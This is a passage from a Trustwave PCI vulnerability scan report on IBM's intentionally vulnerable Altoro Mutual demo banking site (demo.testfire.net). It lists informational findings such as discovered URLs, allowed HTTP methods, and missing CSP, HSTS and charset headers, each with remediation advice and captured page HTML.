demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.

310 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/subscribe.jsp


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

311 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/status_check.jsp


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 661 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

312 Discovered HTTP Methods 0.0 Info Pass URL: http://65.61.137.117/my%20documents/


Port: tcp/80

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117/my%20documents/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

313 HTTP Responses Missing 0.0 Info Pass URL: http://65.61.137.117/swagger/index.html


Character Encoding Port: tcp/80

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 662 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://65.61.137.117/swagger/index.html

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

314 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/disclaimer.htm?url=http://www.micro


soft.com
Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 663 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

315 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/sendFeedback


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

316 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

317 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/disclaimer.htm?url=http://www.netsc


ape.com
Port: tcp/443

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 664 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

318 Insecure or no Content- 0.0 Info Pass URL: http://demo.testfire.net/


Security-Policy header Port: tcp/80

Content-Security-Policy (CSP) is a W3C specification offering the


possibility to instruct the client browser from which location and/or
which type of resources are allowed to be loaded. This header can be
useful to prevent Cross-Site Scripting issues present on the site, if used
correctly.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Reference:
https://www.owasp.org/index.php/Content_Security_Policy

Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Response: HTTP/1.1 200 OK


Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C;
Path=/; HttpOnly

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 665 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:33:23 GMT
Content-Length: 0

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 666 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/login.jsp"><font
style="font-weight: bold; color: red;">Sign In</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/login.jsp" class="focus" >ONLINE BANKING
LOGIN</a></div></td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 667 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 668 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink3" class="subheader"


href="index.jsp?content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 669 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">

<!-- Keywords:Altoro Mutual, online banking,


banking, checking, savings, accounts -->
<br />
<table border=0 cellspacing=0 width="100%">
<tr>
<td width="33%" valign="top">
<b><a href="index.jsp?content=personal_savings.htm">Online
Banking with FREE Online Bill Pay </a></b><br />
No stamps, envelopes, or checks to write give you more time to
spend on the things you enjoy. <br />
<br />
<center><img src="images/home1.jpg" width="170" height="
114" /></center>
<br />

<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 670 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170"
height="128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />

<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 671 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<center><img src="images/home3.jpg" width="170" height="


113" /></center><br /><br />

<b><a href="survey_questions.jsp">Win a Samsung Galaxy S10


smartphone</a></b>
<br />
Completing this short survey will enter you in a draw for 1 of 5
Samsung Galaxy S10 smartphones! We look forward to hearing your
important feedback.
<br /><br />
</td>
</tr>
</table>

</td>

</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 672 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 673 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.

319 Insufficient or No use of 0.0 Info Pass URL: https://demo.testfire.net:8443/


Strict Transport Security Port: tcp/8443
header
HTTP Strict Transport Security (HSTS) is an opt-in security
enhancement that is specified by a web application through the use of
a special response header. Once a supported browser receives this
header that browser will prevent any communications from being sent
over HTTP to the specified domain and will instead send all
communications over HTTPS. It also prevents HTTPS click through
prompts on browsers.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security

Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://demo.testfire.net:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 674 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Example of response header use-
Strict-Transport-Security: max-age=31536000

320 Enumerated Applications 0.0 Info Pass URL: https://demo.testfire.net/


Port: tcp/443

The following applications have been enumerated on this device.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
CPE: apache:tomcat
URI: /
Version: unknown

Remediation:
No remediation is required.

321 Discovered HTTP Methods 0.0 Info Pass URL: https://65.61.137.117/my%20documents/


Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 675 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117/my%20documents/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

322 HTTP Responses Missing 0.0 Info Pass URL: http://65.61.137.117:8080/high_yield_investments.htm


Character Encoding Port: tcp/8080

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 676 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://65.61.137.117:8080/high_yield_investments.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

323 Discovered Web Directories 0.0 Info Pass URL: http://demo.testfire.net:8080/admin/


Port: tcp/8080

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 677 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:8080/admin/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

324 HTTP Responses Missing 0.0 Info Pass URL: https://65.61.137.117:8443/high_yield_investments.htm


Character Encoding Port: tcp/8443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 678 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://65.61.137.117:8443/high_yield_investments.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

325 HTTP Responses Missing 0.0 Info Pass URL: https://65.61.137.117:8443/swagger/index.html


Character Encoding Port: tcp/8443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 679 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://65.61.137.117:8443/swagger/index.html

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

326 Website Detected 0.0 Info Pass URL: https://65.61.137.117:8443/


Port: tcp/8443

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 680 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Application: apache:tomcat

Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true

327 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/index.jsp?content=business.htm


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

328 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/index.jsp?content=inside_contact.htm


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

329 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/disclaimer.htm?url=http://www.netscape.


com
Port: tcp/80

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 681 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

330 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/feedback.jsp


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

331 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/index.jsp?content=personal.htm


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

332 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/doSubscribe


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 682 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

333 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/swagger/index.html


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

334 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/login.jsp


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

335 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/index.jsp?content=personal.htm


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

336 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/search.jsp?query=_WSETESTDATA


Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 683 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

337 HTTP Responses Missing 0.0 Info Pass URL: https://demo.testfire.net/high_yield_investments.htm


Character Encoding Port: tcp/443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
